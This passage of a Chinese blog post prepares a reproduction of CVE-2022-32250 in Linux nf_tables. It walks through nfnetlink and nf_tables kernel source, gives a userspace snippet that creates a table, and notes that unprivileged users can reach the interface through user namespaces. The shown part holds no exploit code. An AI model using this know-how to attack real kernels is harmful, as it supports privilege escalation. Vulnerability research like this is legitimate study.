CVE-2022-32250复现
196082 慢慢好起来

前言

因为工作目前面对着一个不怎么熟悉的netfilter这一模块,所以直接复现一个以往的CVE来认识认识这个模块。

这里介绍这个模块可能不会很好,所以不熟悉的朋友可以去看 https://www.secrss.com/articles/44817 这篇文章。

nftables介绍

nftables取代了流行的{ip,ip6,arp,eb}tables。该软件提供了一个新的内核数据包分类框架,该框架基于特定于网络的虚拟机 (VM) 和新的nft用户空间命令行工具。nftables重用了现有的netfilter子系统,例如现有的钩子基础设施、连接跟踪系统、NAT、用户空间队列和日志子系统。对于nftables,只需要扩展expression即可,用户自行编写expression,然后让nftables虚拟机执行它。nftables框架的数据结构如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Table{
Chain[
Rule
(expression1,expression2,expression3,...)
| | |--> expression_action
| |--> expression_action
|-->expression_action
Rule
(expression,expression,expression,...)
...
],
Chain[
...
],
...
}

Table是chain的容器,chain是rule的容器,rule是expression的容器,expression负责响应action。整体构成由 table->chain->rule->expression 四级组成的数据结构。

nfnetlink初始化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Init hook taking a struct net: creates the NETLINK_NETFILTER kernel socket
 * for @net and stores it in the namespace.
 * Returns 0 on success, -ENOMEM if netlink_kernel_create() fails.
 */
static int __net_init nfnetlink_net_init(struct net *net)
{
struct sock *nfnl;
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
/* nfnetlink_rcv is registered as the socket's input callback */
.input = nfnetlink_rcv,
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};

nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnl)
return -ENOMEM;
/* keep the socket both as a plain pointer and as the RCU-published net->nfnl */
net->nfnl_stash = nfnl;
rcu_assign_pointer(net->nfnl, nfnl);
return 0;
}

nfnetlink_net_init函数中定义了netlink_kernel_cfg结构,并传给了netlink_kernel_create进行创建。在后续接收消息的时候就会调用nfnetlink_rcv函数了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * Input callback of the nfnetlink socket: validates the first netlink header,
 * checks the sender's privilege and hands the skb either to the batch path or
 * to the per-message path.
 */
static void nfnetlink_rcv(struct sk_buff *skb)
{
struct nlmsghdr *nlh = nlmsg_hdr(skb);

/* silently drop anything too short for a header or for the length it claims */
if (skb->len < NLMSG_HDRLEN ||
nlh->nlmsg_len < NLMSG_HDRLEN ||
skb->len < nlh->nlmsg_len)
return;

/* senders failing the CAP_NET_ADMIN check are answered with -EPERM */
if (!netlink_net_capable(skb, CAP_NET_ADMIN)) {
netlink_ack(skb, nlh, -EPERM, NULL);
return;
}

/* a leading NFNL_MSG_BATCH_BEGIN selects the batch handler */
if (nlh->nlmsg_type == NFNL_MSG_BATCH_BEGIN)
nfnetlink_rcv_skb_batch(skb, nlh);
else
netlink_rcv_skb(skb, nfnetlink_rcv_msg);
}

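其中需要CAP_NET_ADMIN才能访问。不过netlink_net_capable检查的是发送者在该网络命名空间所属的user namespace中是否拥有CAP_NET_ADMIN,因此如果内核编译时开启了CONFIG_USER_NS(并且允许非特权用户创建user namespace),普通用户可以先创建新的user namespace和network namespace,在其中获得CAP_NET_ADMIN,这样普通用户也是可以访问的。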

以上就是nfnetlink接收消息的完整调用链了。其中以NFNL_MSG_BATCH_BEGIN开头的批处理消息会经由nfnetlink_rcv_skb_batch交给下面的nfnetlink_rcv_batch处理:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
static void nfnetlink_rcv_batch(struct sk_buff *skb, struct nlmsghdr *nlh,
u16 subsys_id, u32 genid)
{
struct sk_buff *oskb = skb;
struct net *net = sock_net(skb->sk);
const struct nfnetlink_subsystem *ss;
const struct nfnl_callback *nc;
struct netlink_ext_ack extack;
LIST_HEAD(err_list);
u32 status;
int err;

if (subsys_id >= NFNL_SUBSYS_COUNT)
return netlink_ack(skb, nlh, -EINVAL, NULL);
replay:
status = 0;

skb = netlink_skb_clone(oskb, GFP_KERNEL);
if (!skb)
return netlink_ack(oskb, nlh, -ENOMEM, NULL);

nfnl_lock(subsys_id);
ss = nfnl_dereference_protected(subsys_id);
if (!ss) {
#ifdef CONFIG_MODULES
nfnl_unlock(subsys_id);
request_module("nfnetlink-subsys-%d", subsys_id);
nfnl_lock(subsys_id);
ss = nfnl_dereference_protected(subsys_id);
if (!ss)
#endif
{
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -EOPNOTSUPP, NULL);
return kfree_skb(skb);
}
}

if (!ss->valid_genid || !ss->commit || !ss->abort) {
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -EOPNOTSUPP, NULL);
return kfree_skb(skb);
}

if (!try_module_get(ss->owner)) {
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -EOPNOTSUPP, NULL);
return kfree_skb(skb);
}

if (!ss->valid_genid(net, genid)) {
module_put(ss->owner);
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -ERESTART, NULL);
return kfree_skb(skb);
}

nfnl_unlock(subsys_id);

while (skb->len >= nlmsg_total_size(0)) {
int msglen, type;

if (fatal_signal_pending(current)) {
nfnl_err_reset(&err_list);
err = -EINTR;
status = NFNL_BATCH_FAILURE;
goto done;
}

memset(&extack, 0, sizeof(extack));
nlh = nlmsg_hdr(skb);
err = 0;

if (nlh->nlmsg_len < NLMSG_HDRLEN ||
skb->len < nlh->nlmsg_len ||
nlmsg_len(nlh) < sizeof(struct nfgenmsg)) {
nfnl_err_reset(&err_list);
status |= NFNL_BATCH_FAILURE;
goto done;
}

/* Only requests are handled by the kernel */
if (!(nlh->nlmsg_flags & NLM_F_REQUEST)) {
err = -EINVAL;
goto ack;
}

type = nlh->nlmsg_type;
if (type == NFNL_MSG_BATCH_BEGIN) {
/* Malformed: Batch begin twice */
nfnl_err_reset(&err_list);
status |= NFNL_BATCH_FAILURE;
goto done;
} else if (type == NFNL_MSG_BATCH_END) {
status |= NFNL_BATCH_DONE;
goto done;
} else if (type < NLMSG_MIN_TYPE) {
err = -EINVAL;
goto ack;
}

/* We only accept a batch with messages for the same
* subsystem.
*/
if (NFNL_SUBSYS_ID(type) != subsys_id) {
err = -EINVAL;
goto ack;
}

nc = nfnetlink_find_client(type, ss);
if (!nc) {
err = -EINVAL;
goto ack;
}

{
int min_len = nlmsg_total_size(sizeof(struct nfgenmsg));
u8 cb_id = NFNL_MSG_TYPE(nlh->nlmsg_type);
struct nlattr *cda[NFNL_MAX_ATTR_COUNT + 1];
struct nlattr *attr = (void *)nlh + min_len;
int attrlen = nlh->nlmsg_len - min_len;

/* Sanity-check NFTA_MAX_ATTR */
if (ss->cb[cb_id].attr_count > NFNL_MAX_ATTR_COUNT) {
err = -ENOMEM;
goto ack;
}

err = nla_parse(cda, ss->cb[cb_id].attr_count, attr,
attrlen, ss->cb[cb_id].policy, NULL);
if (err < 0)
goto ack;

if (nc->call_batch) {
err = nc->call_batch(net, net->nfnl, skb, nlh,
(const struct nlattr **)cda,
&extack);
}

/* The lock was released to autoload some module, we
* have to abort and start from scratch using the
* original skb.
*/
if (err == -EAGAIN) {
status |= NFNL_BATCH_REPLAY;
goto done;
}
}
ack:
if (nlh->nlmsg_flags & NLM_F_ACK || err) {
/* Errors are delivered once the full batch has been
* processed, this avoids that the same error is
* reported several times when replaying the batch.
*/
if (nfnl_err_add(&err_list, nlh, err, &extack) < 0) {
/* We failed to enqueue an error, reset the
* list of errors and send OOM to userspace
* pointing to the batch header.
*/
nfnl_err_reset(&err_list);
netlink_ack(oskb, nlmsg_hdr(oskb), -ENOMEM,
NULL);
status |= NFNL_BATCH_FAILURE;
goto done;
}
/* We don't stop processing the batch on errors, thus,
* userspace gets all the errors that the batch
* triggers.
*/
if (err)
status |= NFNL_BATCH_FAILURE;
}

msglen = NLMSG_ALIGN(nlh->nlmsg_len);
if (msglen > skb->len)
msglen = skb->len;
skb_pull(skb, msglen);
}
done:
if (status & NFNL_BATCH_REPLAY) {
ss->abort(net, oskb);
nfnl_err_reset(&err_list);
kfree_skb(skb);
module_put(ss->owner);
goto replay;
} else if (status == NFNL_BATCH_DONE) {
err = ss->commit(net, oskb);
if (err == -EAGAIN) {
status |= NFNL_BATCH_REPLAY;
goto done;
} else if (err) {
ss->abort(net, oskb);
netlink_ack(oskb, nlmsg_hdr(oskb), err, NULL);
}
} else {
ss->abort(net, oskb);
}
if (ss->cleanup)
ss->cleanup(net);

nfnl_err_deliver(&err_list, oskb);
kfree_skb(skb);
module_put(ss->owner);
}

首先通过

1
ss = nfnl_dereference_protected(subsys_id);

取出subsys_id对应的subsystem,subsys_id的可选值如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * nfnetlink subsystem identifiers. NFNL_SUBSYS_COUNT is one past the highest
 * id; nfnetlink_rcv_batch() rejects any subsys_id >= NFNL_SUBSYS_COUNT.
 */
#define NFNL_SUBSYS_NONE 		0
#define NFNL_SUBSYS_CTNETLINK 1
#define NFNL_SUBSYS_CTNETLINK_EXP 2
#define NFNL_SUBSYS_QUEUE 3
#define NFNL_SUBSYS_ULOG 4
#define NFNL_SUBSYS_OSF 5
#define NFNL_SUBSYS_IPSET 6
#define NFNL_SUBSYS_ACCT 7
#define NFNL_SUBSYS_CTNETLINK_TIMEOUT 8
#define NFNL_SUBSYS_CTHELPER 9
#define NFNL_SUBSYS_NFTABLES 10
#define NFNL_SUBSYS_NFT_COMPAT 11
#define NFNL_SUBSYS_HOOK 12
#define NFNL_SUBSYS_COUNT 13

这里我们对nftables进行操作,那么subsys_id很明显就是NFNL_SUBSYS_NFTABLES,即10(0xa)。

1
2
3
4
5
6
7
8
9
10
/*
 * Map a netlink message type to the subsystem's callback entry.
 * The callback index is NFNL_MSG_TYPE(@type); returns NULL when that index is
 * not below ss->cb_count, otherwise a pointer into ss->cb[].
 */
static inline const struct nfnl_callback *
nfnetlink_find_client(u16 type, const struct nfnetlink_subsystem *ss)
{
u8 cb_id = NFNL_MSG_TYPE(type);

/* bounds check before indexing the callback table */
if (cb_id >= ss->cb_count)
return NULL;

return &ss->cb[cb_id];
}

在获得subsystem之后就会进入上面的函数,拿到对应的客户端

1
2
3
4
5
6
7
8
9
10
11
/*
 * nfnetlink subsystem descriptor for nf_tables: binds subsystem id
 * NFNL_SUBSYS_NFTABLES to the nf_tables_cb callback table (NFT_MSG_MAX
 * entries) and supplies the commit/abort/cleanup/valid_genid hooks that
 * nfnetlink_rcv_batch() invokes through ss->...
 */
static const struct nfnetlink_subsystem nf_tables_subsys = {
.name = "nf_tables",
.subsys_id = NFNL_SUBSYS_NFTABLES,
.cb_count = NFT_MSG_MAX,
.cb = nf_tables_cb,
.commit = nf_tables_commit,
.abort = nf_tables_abort,
.cleanup = nf_tables_cleanup,
.valid_genid = nf_tables_valid_genid,
.owner = THIS_MODULE,
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
static const struct nfnl_callback nf_tables_cb[NFT_MSG_MAX] = {
[NFT_MSG_NEWTABLE] = {
.call_batch = nf_tables_newtable,
.attr_count = NFTA_TABLE_MAX,
.policy = nft_table_policy,
},
[NFT_MSG_GETTABLE] = {
.call_rcu = nf_tables_gettable,
.attr_count = NFTA_TABLE_MAX,
.policy = nft_table_policy,
},
[NFT_MSG_DELTABLE] = {
.call_batch = nf_tables_deltable,
.attr_count = NFTA_TABLE_MAX,
.policy = nft_table_policy,
},
[NFT_MSG_NEWCHAIN] = {
.call_batch = nf_tables_newchain,
.attr_count = NFTA_CHAIN_MAX,
.policy = nft_chain_policy,
},
[NFT_MSG_GETCHAIN] = {
.call_rcu = nf_tables_getchain,
.attr_count = NFTA_CHAIN_MAX,
.policy = nft_chain_policy,
},
[NFT_MSG_DELCHAIN] = {
.call_batch = nf_tables_delchain,
.attr_count = NFTA_CHAIN_MAX,
.policy = nft_chain_policy,
},
[NFT_MSG_NEWRULE] = {
.call_batch = nf_tables_newrule,
.attr_count = NFTA_RULE_MAX,
.policy = nft_rule_policy,
},
[NFT_MSG_GETRULE] = {
.call_rcu = nf_tables_getrule,
.attr_count = NFTA_RULE_MAX,
.policy = nft_rule_policy,
},
[NFT_MSG_DELRULE] = {
.call_batch = nf_tables_delrule,
.attr_count = NFTA_RULE_MAX,
.policy = nft_rule_policy,
},
[NFT_MSG_NEWSET] = {
.call_batch = nf_tables_newset,
.attr_count = NFTA_SET_MAX,
.policy = nft_set_policy,
},
[NFT_MSG_GETSET] = {
.call_rcu = nf_tables_getset,
.attr_count = NFTA_SET_MAX,
.policy = nft_set_policy,
},
[NFT_MSG_DELSET] = {
.call_batch = nf_tables_delset,
.attr_count = NFTA_SET_MAX,
.policy = nft_set_policy,
},
[NFT_MSG_NEWSETELEM] = {
.call_batch = nf_tables_newsetelem,
.attr_count = NFTA_SET_ELEM_LIST_MAX,
.policy = nft_set_elem_list_policy,
},
[NFT_MSG_GETSETELEM] = {
.call_rcu = nf_tables_getsetelem,
.attr_count = NFTA_SET_ELEM_LIST_MAX,
.policy = nft_set_elem_list_policy,
},
[NFT_MSG_DELSETELEM] = {
.call_batch = nf_tables_delsetelem,
.attr_count = NFTA_SET_ELEM_LIST_MAX,
.policy = nft_set_elem_list_policy,
},
[NFT_MSG_GETGEN] = {
.call_rcu = nf_tables_getgen,
},
[NFT_MSG_NEWOBJ] = {
.call_batch = nf_tables_newobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_GETOBJ] = {
.call_rcu = nf_tables_getobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_DELOBJ] = {
.call_batch = nf_tables_delobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_GETOBJ_RESET] = {
.call_rcu = nf_tables_getobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_NEWFLOWTABLE] = {
.call_batch = nf_tables_newflowtable,
.attr_count = NFTA_FLOWTABLE_MAX,
.policy = nft_flowtable_policy,
},
[NFT_MSG_GETFLOWTABLE] = {
.call_rcu = nf_tables_getflowtable,
.attr_count = NFTA_FLOWTABLE_MAX,
.policy = nft_flowtable_policy,
},
[NFT_MSG_DELFLOWTABLE] = {
.call_batch = nf_tables_delflowtable,
.attr_count = NFTA_FLOWTABLE_MAX,
.policy = nft_flowtable_policy,
},
};

上述nfnetlink_subsystem结构体中的cb成员即客户端(回调表)。再看对应的nf_tables_cb,它针对不同的操作定义了多个回调客户端,例如NFT_MSG_NEWTABLE、NFT_MSG_NEWCHAIN之类的操作。

创建table操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Build and send a netlink batch that creates one IPv4 nftables table.
 *
 * Expects the surrounding code to provide:
 *   table_name - name of the table to create
 *   buf        - buffer backing the batch
 *   nl         - mnl socket that has already been opened
 *
 * Batch layout: BATCH_BEGIN | NFT_MSG_NEWTABLE | BATCH_END. Every message
 * written at mnl_nlmsg_batch_current() must be followed by
 * mnl_nlmsg_batch_next(), otherwise the next message is written at the same
 * position and overwrites it.
 */
uint8_t family = NFPROTO_IPV4;
struct nftnl_table *table = nftnl_table_alloc();
if (table == NULL)
	errExit(1, "nftnl_table_alloc");
nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
int seq = 0;

/* message 1: batch begin */
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

struct nlmsghdr *nlh;
/* sequence number of the NEWTABLE request, kept for whoever checks the ACK */
int table_seq = seq;

/* message 2: NFT_MSG_NEWTABLE carrying the table attributes */
nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, table);
/* advance past the table message so batch end does not overwrite it */
mnl_nlmsg_batch_next(batch);

/* message 3: batch end */
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

if (nl == NULL)
	errExit(1, "mnl_socket_open");

if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
		      mnl_nlmsg_batch_size(batch)) < 0)
	err(1, "mnl_socket_send");

上面就是生成一个table的小🌰。

1
2
3
4
5
if (nc->call_batch) {
err = nc->call_batch(net, net->nfnl, skb, nlh,
(const struct nlattr **)cda,
&extack);
}

然后在内核中会调用客户端对应的call_batch成员,这里创建table对应的就是nf_tables_newtable函数了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
/*
 * Batch callback for NFT_MSG_NEWTABLE.
 *
 * If a table with the given name/family already exists, the request is
 * treated as an update (or rejected for NLM_F_EXCL / NLM_F_REPLACE).
 * Otherwise a new struct nft_table is allocated, initialised, recorded as a
 * transaction and linked into net->nft.tables.
 *
 * Returns 0 on success or a negative errno: the lookup error (other than
 * -ENOENT), -EEXIST, -EOPNOTSUPP, -EINVAL for unknown flags, -ENOMEM on
 * allocation failure, or the error from rhltable_init()/nft_trans_table_add().
 */
static int nf_tables_newtable(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr * const nla[],
struct netlink_ext_ack *extack)
{
const struct nfgenmsg *nfmsg = nlmsg_data(nlh);
u8 genmask = nft_genmask_next(net);
int family = nfmsg->nfgen_family;
const struct nlattr *attr;
struct nft_table *table;
u32 flags = 0;
struct nft_ctx ctx;
int err;

lockdep_assert_held(&net->nft.commit_mutex);
attr = nla[NFTA_TABLE_NAME];
table = nft_table_lookup(net, attr, family, genmask);
if (IS_ERR(table)) {
/* -ENOENT just means "create a new one"; anything else is fatal */
if (PTR_ERR(table) != -ENOENT)
return PTR_ERR(table);
} else {
/* table already exists: update path */
if (nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, nlh, family, table, NULL, nla);
return nf_tables_updtable(&ctx);
}

/* only NFT_TABLE_F_DORMANT is accepted as a table flag */
if (nla[NFTA_TABLE_FLAGS]) {
flags = ntohl(nla_get_be32(nla[NFTA_TABLE_FLAGS]));
if (flags & ~NFT_TABLE_F_DORMANT)
return -EINVAL;
}

err = -ENOMEM;
table = kzalloc(sizeof(*table), GFP_KERNEL);
if (table == NULL)
goto err_kzalloc;

table->name = nla_strdup(attr, GFP_KERNEL);
if (table->name == NULL)
goto err_strdup;

err = rhltable_init(&table->chains_ht, &nft_chain_ht_params);
if (err)
goto err_chain_ht;

INIT_LIST_HEAD(&table->chains);
INIT_LIST_HEAD(&table->sets);
INIT_LIST_HEAD(&table->objects);
INIT_LIST_HEAD(&table->flowtables);
table->family = family;
table->flags = flags;
table->handle = ++table_handle;

/* record the new table as a transaction before making it visible in the list */
nft_ctx_init(&ctx, net, skb, nlh, family, table, NULL, nla);
err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE);
if (err < 0)
goto err_trans;

list_add_tail_rcu(&table->list, &net->nft.tables);
return 0;
/* unwind in reverse order of acquisition */
err_trans:
rhltable_destroy(&table->chains_ht);
err_chain_ht:
kfree(table->name);
err_strdup:
kfree(table);
err_kzalloc:
return err;
}

首先取出attr = nla[NFTA_TABLE_NAME];,并通过nft_table_lookup查找是否已存在对应的table。如果存在则调用nf_tables_updtable(&ctx);进行更新(带有NLM_F_EXCL或NLM_F_REPLACE标志时直接返回错误);如果不存在则使用kzalloc创建并初始化,然后将其放到上下文ctx中,通过nft_trans_table_add加入事务,最后加入到&net->nft.tables链表中。

创建chain操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
static int nf_tables_newchain(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr * const nla[],
struct netlink_ext_ack *extack)
{
const struct nfgenmsg *nfmsg = nlmsg_data(nlh);
u8 genmask = nft_genmask_next(net);
int family = nfmsg->nfgen_family;
const struct nlattr *attr;
struct nft_table *table;
struct nft_chain *chain;
u8 policy = NF_ACCEPT;
struct nft_ctx ctx;
u64 handle = 0;

lockdep_assert_held(&net->nft.commit_mutex);

table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_TABLE]);
return PTR_ERR(table);
}

chain = NULL;
attr = nla[NFTA_CHAIN_NAME];

if (nla[NFTA_CHAIN_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_CHAIN_HANDLE]));
chain = nft_chain_lookup_byhandle(table, handle, genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_HANDLE]);
return PTR_ERR(chain);
}
attr = nla[NFTA_CHAIN_HANDLE];
} else {
chain = nft_chain_lookup(net, table, attr, genmask);
if (IS_ERR(chain)) {
if (PTR_ERR(chain) != -ENOENT) {
NL_SET_BAD_ATTR(extack, attr);
return PTR_ERR(chain);
}
chain = NULL;
}
}

if (nla[NFTA_CHAIN_POLICY]) {
if (chain != NULL &&
!nft_is_base_chain(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

if (chain == NULL &&
nla[NFTA_CHAIN_HOOK] == NULL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

policy = ntohl(nla_get_be32(nla[NFTA_CHAIN_POLICY]));
switch (policy) {
case NF_DROP:
case NF_ACCEPT:
break;
default:
return -EINVAL;
}
}

nft_ctx_init(&ctx, net, skb, nlh, family, table, chain, nla);

if (chain != NULL) {
if (nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

return nf_tables_updchain(&ctx, genmask, policy);
}

return nf_tables_addchain(&ctx, family, genmask, policy);
}

首先通过table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask);获取对应的table,如果没有找到则直接返回错误。然后上面存在两种方式寻找chain:设置了nla[NFTA_CHAIN_HANDLE]时按handle查找(nft_chain_lookup_byhandle),否则按nla[NFTA_CHAIN_NAME]查找(nft_chain_lookup)。如果找到了,调用nf_tables_updchain(&ctx, genmask, policy);进行更新即可;如果没有找到,则使用nf_tables_addchain(&ctx, family, genmask, policy);添加。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
u8 policy)
{
const struct nlattr * const *nla = ctx->nla;
struct nft_table *table = ctx->table;
struct nft_base_chain *basechain;
struct nft_stats __percpu *stats;
struct net *net = ctx->net;
struct nft_chain *chain;
struct nft_rule **rules;
int err;

if (table->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_CHAIN_HOOK]) {
struct nft_chain_hook hook;
struct nf_hook_ops *ops;

err = nft_chain_parse_hook(net, nla, &hook, family, true);
if (err < 0)
return err;

basechain = kzalloc(sizeof(*basechain), GFP_KERNEL);
if (basechain == NULL) {
nft_chain_release_hook(&hook);
return -ENOMEM;
}

if (hook.dev != NULL)
strncpy(basechain->dev_name, hook.dev->name, IFNAMSIZ);

if (nla[NFTA_CHAIN_COUNTERS]) {
stats = nft_stats_alloc(nla[NFTA_CHAIN_COUNTERS]);
if (IS_ERR(stats)) {
nft_chain_release_hook(&hook);
kfree(basechain);
return PTR_ERR(stats);
}
rcu_assign_pointer(basechain->stats, stats);
static_branch_inc(&nft_counters_enabled);
}

basechain->type = hook.type;
chain = &basechain->chain;

ops = &basechain->ops;
ops->pf = family;
ops->hooknum = hook.num;
ops->priority = hook.priority;
ops->priv = chain;
ops->hook = hook.type->hooks[ops->hooknum];
ops->dev = hook.dev;

chain->flags |= NFT_BASE_CHAIN;
basechain->policy = policy;
} else {
chain = kzalloc(sizeof(*chain), GFP_KERNEL);
if (chain == NULL)
return -ENOMEM;
}
ctx->chain = chain;

INIT_LIST_HEAD(&chain->rules);
chain->handle = nf_tables_alloc_handle(table);
chain->table = table;
chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL);
if (!chain->name) {
err = -ENOMEM;
goto err1;
}

rules = nf_tables_chain_alloc_rules(chain, 0);
if (!rules) {
err = -ENOMEM;
goto err1;
}

*rules = NULL;
rcu_assign_pointer(chain->rules_gen_0, rules);
rcu_assign_pointer(chain->rules_gen_1, rules);

err = nf_tables_register_hook(net, table, chain);
if (err < 0)
goto err1;

err = rhltable_insert_key(&table->chains_ht, chain->name,
&chain->rhlhead, nft_chain_ht_params);
if (err)
goto err2;

err = nft_trans_chain_add(ctx, NFT_MSG_NEWCHAIN);
if (err < 0) {
rhltable_remove(&table->chains_ht, &chain->rhlhead,
nft_chain_ht_params);
goto err2;
}

table->use++;
list_add_tail_rcu(&chain->list, &table->chains);

return 0;
err2:
nf_tables_unregister_hook(net, table, chain);
err1:
nf_tables_chain_destroy(ctx);

return err;
}

如果设置了nla[NFTA_CHAIN_HOOK],首先使用basechain = kzalloc(sizeof(*basechain), GFP_KERNEL);创建basechain(否则直接用kzalloc创建一个普通的chain)

1
2
3
4
5
6
7
8
9
/*
 * A base chain: a generic struct nft_chain embedded together with its hook
 * ops, chain type, policy, optional per-CPU stats and device name.
 */
struct nft_base_chain {
struct nf_hook_ops ops;
const struct nft_chain_type *type;
u8 policy;
u8 flags;
struct nft_stats __percpu *stats;
/* embedded generic chain; nf_tables_addchain() uses &basechain->chain as the chain */
struct nft_chain chain;
char dev_name[IFNAMSIZ];
};

随后将其中chain成员的地址(&basechain->chain)赋给chain,后续就是一系列的初始化环节。

创建rule操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
static int nf_tables_newrule(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr * const nla[],
struct netlink_ext_ack *extack)
{
const struct nfgenmsg *nfmsg = nlmsg_data(nlh);
u8 genmask = nft_genmask_next(net);
struct nft_expr_info *info = NULL;
int family = nfmsg->nfgen_family;
struct nft_table *table;
struct nft_chain *chain;
struct nft_rule *rule, *old_rule = NULL;
struct nft_userdata *udata;
struct nft_trans *trans = NULL;
struct nft_expr *expr;
struct nft_ctx ctx;
struct nlattr *tmp;
unsigned int size, i, n, ulen = 0, usize = 0;
int err, rem;
u64 handle, pos_handle;

lockdep_assert_held(&net->nft.commit_mutex);

table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
return PTR_ERR(table);
}

